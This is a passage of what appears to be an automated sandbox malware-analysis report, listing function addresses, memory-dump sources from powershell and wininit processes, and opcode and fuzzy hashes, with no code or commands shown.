                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction ID: 86eb2f9ca4e834e1e3da49ab87b1c7c4a5649de25636e4408f632a4ddd8bd0e5
                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction Fuzzy Hash: EAE01A31B0C8088FDA68EA0CE0409AA77E1FBA8361B1101B7D24EC7961CB32EC518B84

                                                                  Non-executed Functions

                                                                  Function 00007FF848AE8B69 Relevance: 6.4, Strings: 5, Instructions: 156COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2662147284.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: N_^7$N_^8$N_^?$N_^@$N_^F
                                                                  • API String ID: 0-358538561
                                                                  • Opcode ID: 7289889e85b9c2f2e34ac98c3dad5a72bcc0ad2526768ddf8618a0cee5c3eeb3
                                                                  • Instruction ID: c42b0a71ce5d2caa832a22afe89834f5432b2f607f0d383e91735b2e445ddb86
                                                                  • Opcode Fuzzy Hash: 7289889e85b9c2f2e34ac98c3dad5a72bcc0ad2526768ddf8618a0cee5c3eeb3
                                                                  • Instruction Fuzzy Hash: 8241F463A0D4262AD301BF7CBC252ED7760DF952B974405B7DA88CE043EC18708B86D6
                                                                  Function 00007FF848AE89FA Relevance: 5.1, Strings: 4, Instructions: 83COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2662147284.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ff848ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: N_^$N_^$N_^$N_^
                                                                  • API String ID: 0-3900292545
                                                                  • Opcode ID: 77911f179c6ce94dc87c19e6e6a76f8f05d87de9e1725276d42493decbcf97e3
                                                                  • Instruction ID: bb3ddb95ab045bb5e83b944832ccbe9bd76c8fe5cf322c8d72eed8b2da726130
                                                                  • Opcode Fuzzy Hash: 77911f179c6ce94dc87c19e6e6a76f8f05d87de9e1725276d42493decbcf97e3
                                                                  • Instruction Fuzzy Hash: 9131AAB394F9C24FE36A9718586A1B8BFA0FF12358F0905F5C4858B093EE591486D357

                                                                  Executed Functions

                                                                  Function 00007FF848AE644D Relevance: .7, Instructions: 693COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2756667988.00007FF848AE5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE5000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ff848ae5000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 67b911683ef63a2b94af2a12dce15fd657f04a1bc54f7634a2ba72903b6cac09
                                                                  • Instruction ID: 70f9b2c01aed87f596fcdc61465832ad7b9c64030082d7cecb31fbdf130526bb
                                                                  • Opcode Fuzzy Hash: 67b911683ef63a2b94af2a12dce15fd657f04a1bc54f7634a2ba72903b6cac09
                                                                  • Instruction Fuzzy Hash: D4D18E30918A4D8FDB88EF58C455AFD7BE1FF68340F14496AD409D7296CB78E881CB91
                                                                  Function 00007FF848BB6605 Relevance: .4, Instructions: 430COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2757280092.00007FF848BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ff848bb0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a449f7668c734c3dfedcd485f58d256e41e331521009e378603b790a6fe5ae4f
                                                                  • Instruction ID: 7a45dc4af69517a5d927b7d528a21fa6fdbd26a36c130ea44a17cc09f172b3a2
                                                                  • Opcode Fuzzy Hash: a449f7668c734c3dfedcd485f58d256e41e331521009e378603b790a6fe5ae4f
                                                                  • Instruction Fuzzy Hash: BAC14331D0EA8A5FEB9AAB2858155B57BA0FF26390F0401FFD44DCB9D3EA18AC05C355
                                                                  Function 00007FF848AE9780 Relevance: .1, Instructions: 127COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2756667988.00007FF848AE5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE5000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ff848ae5000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 274374d45362b2d9f14a504e153956b9e7f3a1976f7bba35d90c1ccd7b5fe112
                                                                  • Instruction ID: 7481ae8af16ad308da6f6786303f06fb0570af76d650a6b3c040c059fc6d9789
                                                                  • Opcode Fuzzy Hash: 274374d45362b2d9f14a504e153956b9e7f3a1976f7bba35d90c1ccd7b5fe112
                                                                  • Instruction Fuzzy Hash: 2C31F53191DB888FDB19DB5CA84A6B97BE0FB99310F04426FE449C3252CA74A855CBC7
                                                                  Function 00007FF8489CED40 Relevance: .1, Instructions: 124COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2756039077.00007FF8489CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489CD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ff8489cd000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 23f42626d5b1cb2a9f9e792bfd9eebc45ef9b72d83781baad82483a79d847f60
                                                                  • Instruction ID: e4c4536029b3320f38597a95768688b63f2159bd73012a05b358d13eee41029e
                                                                  • Opcode Fuzzy Hash: 23f42626d5b1cb2a9f9e792bfd9eebc45ef9b72d83781baad82483a79d847f60
                                                                  • Instruction Fuzzy Hash: C841063080DBC44FD7569B28D845A523FF0EF57261F1506DFD089CB5A3D629A84AC7A2
                                                                  Function 00007FF848AEA49C Relevance: .1, Instructions: 101COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2756667988.00007FF848AE5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE5000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ff848ae5000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5fd5e8f198188a0b38bf7eeef7506db9e91c137298c2db6eee1e24341dac807a
                                                                  • Instruction ID: 09a604db8c18051a8dad44c00dff6da751a55f3fc05c934a538ed89ffae58f9d
                                                                  • Opcode Fuzzy Hash: 5fd5e8f198188a0b38bf7eeef7506db9e91c137298c2db6eee1e24341dac807a
                                                                  • Instruction Fuzzy Hash: C021063190CB4C4FDB59DF6C984A7E97BE0EB96320F04416BD049C3152DB74A85ACB92
                                                                  Function 00007FF848BB4465 Relevance: .1, Instructions: 64COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2757280092.00007FF848BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ff848bb0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 78047a2a044697fb2662257cd5ce3d9aee639c8ad2b03ec894f35aadf6e34570
                                                                  • Instruction ID: d0fb87485b6f2d2c3162af878dcaff498d6ab993bc303d6eac5fd61bf2c077f0
                                                                  • Opcode Fuzzy Hash: 78047a2a044697fb2662257cd5ce3d9aee639c8ad2b03ec894f35aadf6e34570
                                                                  • Instruction Fuzzy Hash: F5118B32B0C9098FDB99EA0CE4419E873E1FF98730B5400BBD20ACB562DA25EC55C784
                                                                  Function 00007FF848AE33B5 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2756667988.00007FF848AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ff848ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                  • Instruction ID: bd3adfa385975d6a6da2b834c67da4ca9a38c3adf2169c116a024e76d5fb9c34
                                                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                  • Instruction Fuzzy Hash: B601447115CB094FDB44EF0CE451AA9B7E0FB95364F10056DE58AC3651DA26E882CB46
                                                                  Function 00007FF848BB4148 Relevance: .0, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2757280092.00007FF848BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ff848bb0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1aa874a1bf280d50bb4591e50218aef5aa44f3983389fe178ec86dd7af11c349
                                                                  • Instruction ID: f5718aa505c76983a8967dce630bc930db01f3315aa9b284dac6fd522e1754e3
                                                                  • Opcode Fuzzy Hash: 1aa874a1bf280d50bb4591e50218aef5aa44f3983389fe178ec86dd7af11c349
                                                                  • Instruction Fuzzy Hash: CCF0F031E0D5458FDB58EB0CE4008A47BE0FF24360B0200BAE15DC78A3CB29EC408758
                                                                  Function 00007FF848BB43FB Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2757280092.00007FF848BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ff848bb0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0eaf14e35a745a2c2eff64a026a84099179723549b5f2c31ea89a0c1b564288e
                                                                  • Instruction ID: f34f25fedc788c842e56c07ec03a2a0cc878c042a0f6d35f9905612ff88a810e
                                                                  • Opcode Fuzzy Hash: 0eaf14e35a745a2c2eff64a026a84099179723549b5f2c31ea89a0c1b564288e
                                                                  • Instruction Fuzzy Hash: 22F0BE31A0D5868FDB54EB1CE4418A877E0FF15360F0600BAE25DCB8A3CB29EC64C764
                                                                  Function 00007FF848BB41D1 Relevance: .0, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2757280092.00007FF848BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ff848bb0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction ID: 86eb2f9ca4e834e1e3da49ab87b1c7c4a5649de25636e4408f632a4ddd8bd0e5
                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction Fuzzy Hash: EAE01A31B0C8088FDA68EA0CE0409AA77E1FBA8361B1101B7D24EC7961CB32EC518B84

                                                                  Non-executed Functions

                                                                  Function 00007FF848AE8BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2756667988.00007FF848AE5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AE5000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ff848ae5000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
                                                                  • API String ID: 0-2388461625
                                                                  • Opcode ID: 9fbcb04bfe035fe85d9bc315c2e0a04bc0a348d1a00b88d828a9925e65419bb9
                                                                  • Instruction ID: 5f9ed46ffd10cc1e020339c20f6cc093c0e6cd464d33fe557269b201e3ed55a2
                                                                  • Opcode Fuzzy Hash: 9fbcb04bfe035fe85d9bc315c2e0a04bc0a348d1a00b88d828a9925e65419bb9
                                                                  • Instruction Fuzzy Hash: EB21D473A095255AC3027BBCBC665EC6B91DF553B834901F3EA18CF513D928A4CB8682

                                                                  Executed Functions

                                                                  Function 00007FF848BD6605 Relevance: 6.7, Strings: 5, Instructions: 432COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2911035797.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_7ff848bd0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (BH$(BH$(BH$(BH$(BH
                                                                  • API String ID: 0-338949797
                                                                  • Opcode ID: af92add1772d59eadb8a70c564b642b6e329d9ab7363e40031d7a5dd884e3c4e
                                                                  • Instruction ID: 8227d8ae70485d93e9b1107aec89a46b05587038b2aa713d1986dfe009b44413
                                                                  • Opcode Fuzzy Hash: af92add1772d59eadb8a70c564b642b6e329d9ab7363e40031d7a5dd884e3c4e
                                                                  • Instruction Fuzzy Hash: F3D13331D0EA8A6FEB9AAB2858155B57BE0FF16390F0401BBD40DCB1D3EA19AC05C795
                                                                  Function 00007FF848B0644D Relevance: 1.9, Strings: 1, Instructions: 690COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2910044985.00007FF848B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_7ff848b00000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HH
                                                                  • API String ID: 0-740574
                                                                  • Opcode ID: 7562bc2d1dd63937aa1ab06f3bd78f58242099afc176ae5c7579d69d9f2ed344
                                                                  • Instruction ID: 38a36d5ac30973b1c6b764d64b747dbfda1ca8b4514ba70134d756c672e742cd
                                                                  • Opcode Fuzzy Hash: 7562bc2d1dd63937aa1ab06f3bd78f58242099afc176ae5c7579d69d9f2ed344
                                                                  • Instruction Fuzzy Hash: 58D17030A1CA4E8FDF95EF58C455AAD7BE1FF6A340F14416AD409E7296DB34E881CB80
                                                                  Function 00007FF848BD4073 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2911035797.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_7ff848bd0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8>H
                                                                  • API String ID: 0-780718992
                                                                  • Opcode ID: f48bd504db6e8a1153f7f414345f36b2d91ad7495fc5470e8ae7dc5ec22b45af
                                                                  • Instruction ID: 5a72c5ea6258dc41e3d1c3b9380e8d191c1016b4741196e08c710ef816dc8714
                                                                  • Opcode Fuzzy Hash: f48bd504db6e8a1153f7f414345f36b2d91ad7495fc5470e8ae7dc5ec22b45af
                                                                  • Instruction Fuzzy Hash: 4A514632E0DE8A5FE799EA2C54116757BE2FF95260F0801BAC10EC7593DF24EC058B45
                                                                  Function 00007FF848BD4370 Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2911035797.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_7ff848bd0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: p>H
                                                                  • API String ID: 0-3447937937
                                                                  • Opcode ID: 16537f16fb6e82400a83415829c0b0351f7ce9ae46483eecd2eead99745a07ee
                                                                  • Instruction ID: 9f617fd16844011e8b9f7b93f3319d393b45fd0b896d722c8feef0ea430cc197
                                                                  • Opcode Fuzzy Hash: 16537f16fb6e82400a83415829c0b0351f7ce9ae46483eecd2eead99745a07ee
                                                                  • Instruction Fuzzy Hash: E6416732E0DA4A5FE7A9EB2CA4116B877D1EF45760F0801BAC04DC7583EF18AC108B85
                                                                  Function 00007FF848BD40BF Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2911035797.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_7ff848bd0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8>H
                                                                  • API String ID: 0-780718992
                                                                  • Opcode ID: f6c8658deebaab194ca365528ec725a19fdaf24d824f609bc059aef57d5d3185
                                                                  • Instruction ID: e3d4a1b7eecf982e5322b2e058be7c4e882b8cbe11b3bad665660dbb3bf13b7c
                                                                  • Opcode Fuzzy Hash: f6c8658deebaab194ca365528ec725a19fdaf24d824f609bc059aef57d5d3185
                                                                  • Instruction Fuzzy Hash: 2321E432D0DA876FE7A9EB2C54512756AD1FF64390F4901B9C05DC79E2CF18EC048B49
                                                                  Function 00007FF848BD43BC Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2911035797.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_7ff848bd0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: p>H
                                                                  • API String ID: 0-3447937937
                                                                  • Opcode ID: 1862a51c6d53b6684241db3ba80539c44a553d18b9fab9c7bf9dd4457232c2a9
                                                                  • Instruction ID: 9035521ab291b30a2f7ceb9a1a0899824f3b498f019291fdc7827eea4fcfbe5a
                                                                  • Opcode Fuzzy Hash: 1862a51c6d53b6684241db3ba80539c44a553d18b9fab9c7bf9dd4457232c2a9
                                                                  • Instruction Fuzzy Hash: D6110232D4EA465FE7A4EB2C94905B877D0FF043A0F4901B6D05DC7993DB18AC508B95
                                                                  Function 00007FF848B09768 Relevance: .1, Instructions: 126COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2910044985.00007FF848B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_7ff848b00000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fdd919dd13ed56f0467105ea0c58d1ebc97085510802706aa3d6ae8a4597e00a
                                                                  • Instruction ID: 8495831141088ce5987f505f1e64b5afbca7b1695879893e7f9da8ff756ae7e2
                                                                  • Opcode Fuzzy Hash: fdd919dd13ed56f0467105ea0c58d1ebc97085510802706aa3d6ae8a4597e00a
                                                                  • Instruction Fuzzy Hash: F331F87191CB489FDB189F5CA8066B97BE1FB99310F00822FE449D3252DB20A8568BC2
                                                                  Function 00007FF848B0B1E5 Relevance: .1, Instructions: 118COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2910044985.00007FF848B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_7ff848b00000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 603fba7cb7f335158430335b9b0f0bb2e7fc72cbbb9e2f6c2e5cbb4c70112492
                                                                  • Instruction ID: 519433466396d5c74786f4ccc400417be5f62894930a8d0f6479a10135a3b147
                                                                  • Opcode Fuzzy Hash: 603fba7cb7f335158430335b9b0f0bb2e7fc72cbbb9e2f6c2e5cbb4c70112492
                                                                  • Instruction Fuzzy Hash: 1E31347080D7C89EDB55EBA898456FA7FF4EBA7321F0441AFD088C7053D664581AC792
                                                                  Function 00007FF8489EEEC0 Relevance: .1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2909071320.00007FF8489ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489ED000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_7ff8489ed000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0994c5c2b2f9c951731e712c76c1bc68a4219255782b27cdcd994c22c64e6d19
                                                                  • Instruction ID: 76bcb2d2ab3bb43caec5a7ca9f0bd9f0967d0e1fc7367fd6bee28ad2dd7a3712
                                                                  • Opcode Fuzzy Hash: 0994c5c2b2f9c951731e712c76c1bc68a4219255782b27cdcd994c22c64e6d19
                                                                  • Instruction Fuzzy Hash: 5F01623150CE088F9BA4EF1DE48595637E0FB983207100A5BD41DC7559D735F891CBC1
                                                                  Function 00007FF848B033B5 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2910044985.00007FF848B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_7ff848b00000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                  • Instruction ID: c8f78315165037af1e615ba83cceccde27e09c629e024590f266635377a494df
                                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                  • Instruction Fuzzy Hash: A701677115CB0C4FDB44EF0CE451AA9B7E0FB99364F10056DE58AC3651DB36E882CB45
                                                                  Function 00007FF848B0A2A8 Relevance: .0, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2910044985.00007FF848B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_7ff848b00000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f4962b4dc26a9a209b56700b2ca4adb897dc80f69d887d3a655c18d6bc19959c
                                                                  • Instruction ID: f27679cc9de6741fd832c7a67ab6584b13f91ebbdeb704b7eee7c1e0b11b5129
                                                                  • Opcode Fuzzy Hash: f4962b4dc26a9a209b56700b2ca4adb897dc80f69d887d3a655c18d6bc19959c
                                                                  • Instruction Fuzzy Hash: 8EE04F31814A4C8F8B45EF28D4099E97BA0FF69305B01029BE81DC7130DB3095A4CBC2

                                                                  Non-executed Functions

                                                                  Function 00007FF848B08BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2910044985.00007FF848B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_7ff848b00000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: L_^4$L_^7$L_^F$L_^J
                                                                  • API String ID: 0-3225005683
                                                                  • Opcode ID: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                  • Instruction ID: 6e2766c26efdb302d0c0488722395980f047c91fa2dd357e0c1055950203a69d
                                                                  • Opcode Fuzzy Hash: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                  • Instruction Fuzzy Hash: AB2126B760C0256ED301BFBDB8085FD3760CF952B834552B3D6988B003EA1870CA8AD0

                                                                  Executed Functions

                                                                  Function 00007FF848B012F8 Relevance: .7, Instructions: 748COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.3177638121.00007FF848B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ff848b00000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ee113abfc15a1bdd69936de97360fc531c85eda609fc5c771bf1b8ddf9af5ecc
                                                                  • Instruction ID: a01bf009c55e235808dd93577f1614e0b462019e47ae44a2828db42ebb116c62
                                                                  • Opcode Fuzzy Hash: ee113abfc15a1bdd69936de97360fc531c85eda609fc5c771bf1b8ddf9af5ecc
                                                                  • Instruction Fuzzy Hash: C332B420B2DA4A9FE798FB3884593BD77D2FF89784F4405B9D40ED3687DE28A8018745
                                                                  Function 00007FF848B01719 Relevance: .7, Instructions: 693COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.3177638121.00007FF848B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ff848b00000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2d8c093ad6ab5879ae9d340e40599515bf3c051241c0c7cf26324a159181515b
                                                                  • Instruction ID: ff0565034880d774899589e4a22dad49e9c1e19f3dce523b22d02b5774b7ea27
                                                                  • Opcode Fuzzy Hash: 2d8c093ad6ab5879ae9d340e40599515bf3c051241c0c7cf26324a159181515b
                                                                  • Instruction Fuzzy Hash: 2822A520B2DA4A9FE798FB3884592BD77D2FF89784F4405B9D40ED36C7DE28A8018745
                                                                  Function 00007FF848B020F5 Relevance: .2, Instructions: 206COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.3177638121.00007FF848B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ff848b00000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f3f630133a5d4be59c0c2af83ad743812d228f90ef7bcd06294398d20732ef75
                                                                  • Instruction ID: 58284e3776658a26d097e9281659c40a7d3c7e385ccb3e7504225d90396f7d65
                                                                  • Opcode Fuzzy Hash: f3f630133a5d4be59c0c2af83ad743812d228f90ef7bcd06294398d20732ef75
                                                                  • Instruction Fuzzy Hash: 3A51F110A1E6C95FD787AB78586427A7FE5DF87256F0801FBE089C71D3EE18480AC356
                                                                  Function 00007FF848B00AD3 Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.3177638121.00007FF848B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_7ff848b00000_wininit.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 9M_^
                                                                  • API String ID: 0-1708477388
